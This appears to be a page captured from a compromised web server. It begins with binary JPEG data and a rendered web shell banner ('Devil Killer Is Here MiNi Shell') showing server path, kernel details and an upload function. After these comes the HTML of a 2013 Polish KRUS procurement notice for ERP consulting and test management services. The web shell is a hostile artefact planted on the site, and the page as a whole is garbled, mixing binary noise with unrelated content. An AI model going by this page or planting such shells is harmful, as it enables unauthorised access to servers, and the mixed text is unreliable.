JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130613/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130613/110975-N-2013.html

<p class="kh_header"><b>Warszawa: Usługi doradcze w zakresie wdrożenia Systemu Zarządzania w KRUS,
w podziale na II  części</b><br>
<b>Numer ogłoszenia: 110975 - 2013; data zamieszczenia: 13.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego - Centrala , Al. Niepodległości 190, 00-608 Warszawa, woj. mazowieckie, tel. 022 5926420, 5926590, faks 022 5926663.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze w zakresie wdrożenia Systemu Zarządzania w KRUS,
w podziale na II  części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług doradczych w zakresie wdrożenia Systemu Zarządzania (System MSS) w KRUS w podziale na części:

Część I obejmuje - wsparcie w zakresie zarządzania projektem System MSS oraz w zakresie specjalistycznych usług konsultingowych dotyczących wdrożenia systemu informatycznego klasy ERP. System informatyczny klasy ERP składa się z następujących komponentów: Oracle-e-Business Suite wersja 12, Hyperion Planning, Business Intelligence Suite Enterprise Edition. 
Szczegółowy zakres usług dotyczy:
a)	Wsparcia Kierownika Projektu System MSS ze strony Zamawiającego w zakresie prowadzenia projektu przez Wykonawcę, zgodnie z metodyką zarządzania projektami PRINCE2, w tym w szczególności wsparcie prac związanych z operacyjnym zarządzaniem realizacją projektu, rozliczanie wymagań Umowy i zamykanie projektu System MSS. 
b)	Wsparcia polegającego na świadczeniu usług doradczych w obszarze organizacji i nadzoru nad wdrażaniem Systemu MSS oraz jego produktów wytwarzanych w poszczególnych fazach projektu, jak również migracją danych do Systemu MSS.     
c)	Przygotowywania raportów z przebiegu niniejszej Umowy w zakresie stanu realizacji usług i produktów miesięcznie oraz doraźnie na każde żądanie Zamawiającego w miarę pojawiających się w trakcie realizacji Umowy potrzeb.
d)	Wsparcia w zakresie specjalistycznych usług konsultingowych dotyczących wdrożenia Systemu MSS :
- udział w spotkaniach organizowanych przez Zamawiającego, w tym z Wykonawcą Systemu MSS, stanowiących specjalistyczne usługi konsultingowe w zakresie uwag związanych z efektywnym wykorzystaniem możliwości ww. komponentów, dotyczących implementacji wymagań oraz sposobu realizacji uwag zgłoszonych przez stronę KRUS podczas procesów testowania i wdrożenia przedprodukcyjnego przez Wykonawcę Systemu MSS.
- opiniowanie i udzielanie rekomendacji w zakresie propozycji realizacji przez Wykonawcę Systemu MSS uwag zgłoszonych przez stronę KRUS podczas procesów testowania i wdrożenia przedprodukcyjnego ww. komponentów oraz przekazywanej Zamawiającemu do odbioru dokumentacji projektowej wytwarzanych dla produktu,
- merytoryczna ocena wniosków o zmiany i kastomizacje - w szczególności projektów technicznych i wycen kosztów zmian ww. komponentów,
- merytoryczna ocena realizacji wymagań w zaimplementowanym Systemie MSS. 

Część II obejmuje - wsparcie w zakresie zarządzania procesem testów Systemu MSS.
Szczegółowy zakres usług dotyczy:
1)	utrzymania i bieżącej aktualizacji harmonogramu testów,
2)	zarządzania zespołem testowym (obsada zespołu testowego należy do zadań  Zamawiającego),
3)	kontroli spójności i aktualizacji sekwencji scenariuszy testowych,
4)	wsparcia Kierownika Projektu System MSS po stronie Zamawiającego w celu zapewnienia logistyki testów,
5)	weryfikacji i aktualizacji dokumentacji testowej,
6)	kierowania procesem testów, w tym:
a)	udział we wprowadzeniu do dnia testowego,
b)	kontrola przebiegu testów,
c)	udział w spotkaniach podsumowujących dzień testowy, w tym:
- weryfikacja statusu wykonania scenariuszy testowych,
-	aktualizacja harmonogramu  testów,
-	weryfikacja prawidłowości kategoryzacji błędów,
-	kontrola działań w przypadku rozbieżnych zdań,
-	weryfikacja podpisywanych protokołów do wykonywanych scenariuszy,
d)	bieżąca kontrola i aktualizacja harmonogramu, obsady i sekwencji testów,
e)	raportowanie postępu testów.
7)	przygotowania raportu końcowego z testów.

Podmiotem wdrażającym System MSS w KRUS - jest firma Comarch S.A.
System MSS jest wdrażany w KRUS z wykorzystaniem metodyki opartej o standardową metodykę zarządzania projektami PRINCE 2.     

System MSS w KRUS jest na etapie testów akceptacyjnych tj. przed pilotażowym wdrożeniem Systemu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.24.60.00-1, 72.22.41.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony niniejszy warunek  w przypadku, gdy:
- dla części I zamówienia Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych i ciągłych wykonuje co najmniej dwie usługi o wartości nie mniejszej niż 300.000,00 zł brutto każda, polegające na pełnieniu nadzoru lub funkcji wsparcia wdrożenia zintegrowanego systemu informatycznego klasy ERP Oracle e-Business Suite wersja 11 i/lub 12, przy czym przynajmniej jedna z nich została zrealizowana dla jednostki administracji publicznej lub sektora publicznego, przynajmniej jedna z tych jednostek posiadała strukturę wielooddziałową oraz przynajmniej  jedna z usług dotyczyła wsparcia wdrożenia systemu realizowanego w technologii Oracle e-Business Suite.
- dla części II zamówienia Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych i ciągłych wykonuje co najmniej dwa projekty dotyczące organizacji i kierowania testami zintegrowanych systemów informatycznych klasy ERP, gdzie  wartość wdrażanych systemów wynosiła co najmniej 5 mln PLN brutto każdy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia - Zamawiający uzna za spełniony niniejszy warunek w przypadku, gdy:
- dla części I zamówienia Wykonawca będzie dysponował specjalistami zdolnymi do wykonania przedmiotu zamówienia, którzy będą pełnili następujące funkcje:
- Ekspert ds. Kierowania Projektem - z wykształceniem wyższym, posiadający kwalifikacje w zakresie zarządzania projektami zgodnie z metodyką PRINCE2, udokumentowane certyfikatem wydanym przez uznaną zewnętrznie jednostkę certyfikującą na poziomie Practitioner. Wymagane jest, aby wykazał się udokumentowanym minimum 5-letnim doświadczeniem w kierowaniu projektami, których przedmiotem były wdrożenia zintegrowanych systemów informatycznych klasy ERP, w tym kierowanie przynajmniej dwoma projektami zakończonymi do dnia ogłoszenia niniejszego przetargu, przy czym ich budżet łączny był nie mniejszy niż co najmniej 5 000 000 PLN brutto,
- Eksperci ds. technologii OeBS (minimum 6 osób) - z wykształceniem wyższym, posiadający wiedzę w zakresie praktycznej znajomości produktu Oracle e-Business Suite wersja 11 i/lub 12 dla modułów: Kadry i Płace, Finanse, Planowanie Inwestycji, Środki Trwałe, Zaopatrzenie, Gospodarka Magazynowa. Wymagane jest, aby wykazali się udokumentowanym doświadczeniem we wdrażaniu produktu Oracle e-Business Suite wersja 11 i/lub 12 w organizacji o strukturze wielooddziałowej oraz wykazali się co najmniej 5 - letnim udokumentowanym doświadczeniem w pełnieniu funkcji eksperta przy wdrożeniu zintegrowanych systemów informatycznych klasy ERP, przy czym ich budżet łączny był nie mniejszy niż co najmniej 5 000 000 PLN brutto,
- Eksperci ds. technologii Hyperion Planning (minimum 2 osoby) - z wykształceniem wyższym, posiadający wiedzę w zakresie praktycznej znajomości produktu Hyperion Planning. Wymagane jest, aby wykazali się udokumentowanym co najmniej 5-letnim doświadczeniem we wdrażaniu produktu Hyperion Planning,
- Ekspert ds. Business Intelligence Suite Enterprise Edition - z wykształceniem wyższym, posiadający wiedzę w zakresie praktycznej znajomości produktu Oracle Business Intelligence Suite Enterprise Edition. Wymagane jest, aby wykazał się udokumentowanym doświadczeniem we wdrażaniu produktu Oracle Business Intelligence Suite Enterprise Edition w organizacji o strukturze wielooddziałowej oraz wykazał się co najmniej 5 - letnim udokumentowanym doświadczeniem w realizacji projektów dot. wdrożenia zintegrowanego systemu informatycznego,
- Ekspert ds. organizacji procesu wdrożeń systemów klasy ERP z uwzględnieniem zagadnień związanych z migracją danych (minimum 1 osoba) z wykształceniem wyższym, posiadający wiedzę w zakresie organizacji wdrożeń systemów klasy ERP i migracji danych. Wymagane jest, aby wykazał się udokumentowanym doświadczeniem w organizacji oraz nadzorowaniu procesu wdrożeń dla co najmniej dwóch systemów klasy ERP i co najmniej dwóch procesów migracji danych w projektach wdrożeniowych.

- dla części II zamówienia Wykonawca będzie dysponował specjalistami zdolnymi do wykonania przedmiotu zamówienia, którzy będą pełnili następujące funkcje:
- Kierownika testów - z wykształceniem wyższym, posiadający wiedzę w zakresie prowadzenia testów systemów informatycznych udokumentowaną  certyfikatem ISTQB Certified Tester na poziomie Advanced Level lub równoważnym, wydanym przez uznaną zewnętrzną jednostkę certyfikującą.  Wymagane jest, aby wykazał się udokumentowanym co najmniej 5 - letnim doświadczeniem w pełnieniu roli Kierownika testów w realizacji co najmniej dwóch usług, których przedmiotem było wdrożenie zintegrowanego systemu informatycznego klasy ERP, gdzie wartość wdrażanych systemów wynosiła co najmniej 5 000 000 PLN brutto każdy. 

Wszystkie ww. technologie i określona metodyka projektowa jest wykorzystywana w realizacji Umowy wdrożenia Systemu MSS.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>należy wykazać usługi potwierdzające spełnianie warunków opisanych w SIWZ, Rozdział I pkt IV ppkt 1 lit. b dla części I i II przedmiotu zamówienia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz oferty,
2. pełnomocnictwo /upoważnienie/ do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile oferta została podpisana przez osoby nie umocowane do tych czynności w dokumentach rejestracyjnych firmy (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza lub wystawcę pełnomocnictwa) [wymagane również, gdy ofertę składają podmioty występujące wspólnie (konsorcjum), a oferta nie jest podpisana przez wszystkich członków konsorcjum],
3.	oświadczenie Wykonawcy wskazujące, którą część zamówienia powierzy wykonaniu przez podwykonawców - zgodnie z art. 36 ust. 4 ustawy Pzp (zamieszczone w Formularzu oferty  - składane tylko w przypadku, gdy Wykonawca przewiduje udział podwykonawców).
4.	dokumenty potwierdzające zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowy zostaną zawarte według Istotnych Postanowień Umowy zamieszczonych w SIWZ, Rozdział III - Istotne Postanowienia Umowy, odrębnie dla każdej z dwóch części przedmiotu zamówienia.
2.	Zamawiający dopuszcza możliwość zmiany postanowień zawartych umów pod warunkiem zaistnienia jednej lub kilku z następujących okoliczności:
2.1.	potrzeba zmiany określonych w Umowie osób, wyznaczonych przez Strony do realizacji zamówienia wynikająca z przyczyn obiektywnych (choroba, niezdolność do pracy, urlop wypoczynkowy, macierzyński lub wychowawczy, zwolnienie z pracy itp.) albo z decyzji Zamawiającego;
2.2.	konieczność zmiany sposobu wykonania Umowy uzasadniona przyczynami technicznymi, organizacyjnymi lub strukturalnymi;
2.3.	w zakresie zmiany terminu realizacji przedmiotu zamówienia z przyczyn niemożliwych wcześniej do przewidzenia lub jeżeli są one korzystne dla Zamawiającego;
2.4.	w przypadku zmiany danych podmiotowych Wykonawcy (np. w wyniku przekształcenia, przejęcia itp.);
2.5.	zmiany w strukturze i organizacji Zamawiającego;
2.6.	opóźnienia w Projekcie System MSS, uniemożliwiającego realizację Umowy zgodnie z określonym pierwotnie harmonogramem lub powodującego, że realizowanie Umowy zgodnie z określonym pierwotnie harmonogramem jest nieracjonalne technicznie, organizacyjnie lub finansowo;
2.7.	zmiany prawne niezależne od Zamawiającego w tym zmiana stawki podatku VAT, przy czym nie ulegną zmianie podane w Umowie wartości brutto za realizację usług.
3.	Ponadto dla części I zamówienia, Zamawiający dopuszcza zmianę szacowanych liczb produktów pomiędzy klasami produktów w ramach ogólnej puli punktów produktowych określonych w załączniku nr 1 lit. A do Umowy, to znaczy dopuszcza zmianę liczby wykonywanych przez Wykonawcę produktów, jak również dopuszcza możliwość zamiany produktów określonych w załączniku nr 1 lit. A na usługi określone w załączniku nr 1 lit. B do Umowy i odwrotnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społeczebgo - Centrala
Al. Niepodległości 190
00-608 Warszawa
Biuro Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2013 godzina 09:30, miejsce: Kasa Rolniczego Ubezpieczenia Społeczebgo - Centrala
Al. Niepodległości 190
00-608 Warszawa
Pok. 101 Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługi doradcze w zakresie wdrożenia Systemu Zarządzania w KRUS, w podziale na II  części.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I obejmuje - wsparcie w zakresie zarządzania projektem System MSS oraz w zakresie specjalistycznych usług konsultingowych dotyczących wdrożenia systemu informatycznego klasy ERP. System informatyczny klasy ERP składa się z następujących komponentów: Oracle-e-Business Suite wersja 12, Hyperion Planning, Business Intelligence Suite Enterprise Edition. 
Szczegółowy zakres usług dotyczy:
a)	Wsparcia Kierownika Projektu System MSS ze strony Zamawiającego w zakresie prowadzenia projektu przez Wykonawcę, zgodnie z metodyką zarządzania projektami PRINCE2, w tym w szczególności wsparcie prac związanych z operacyjnym zarządzaniem realizacją projektu, rozliczanie wymagań Umowy i zamykanie projektu System MSS. 
b)	Wsparcia polegającego na świadczeniu usług doradczych w obszarze organizacji i nadzoru nad wdrażaniem Systemu MSS oraz jego produktów wytwarzanych w poszczególnych fazach projektu, jak również migracją danych do Systemu MSS.     
c)	Przygotowywania raportów z przebiegu niniejszej Umowy w zakresie stanu realizacji usług i produktów miesięcznie oraz doraźnie na każde żądanie Zamawiającego w miarę pojawiających się w trakcie realizacji Umowy potrzeb.
d)	Wsparcia w zakresie specjalistycznych usług konsultingowych dotyczących wdrożenia Systemu MSS :
- udział w spotkaniach organizowanych przez Zamawiającego, w tym z Wykonawcą Systemu MSS, stanowiących specjalistyczne usługi konsultingowe w zakresie uwag związanych z efektywnym wykorzystaniem możliwości ww. komponentów, dotyczących implementacji wymagań oraz sposobu realizacji uwag zgłoszonych przez stronę KRUS podczas procesów testowania i wdrożenia przedprodukcyjnego przez Wykonawcę Systemu MSS.
- opiniowanie i udzielanie rekomendacji w zakresie propozycji realizacji przez Wykonawcę Systemu MSS uwag zgłoszonych przez stronę KRUS podczas procesów testowania i wdrożenia przedprodukcyjnego ww. komponentów oraz przekazywanej Zamawiającemu do odbioru dokumentacji projektowej wytwarzanych dla produktu,
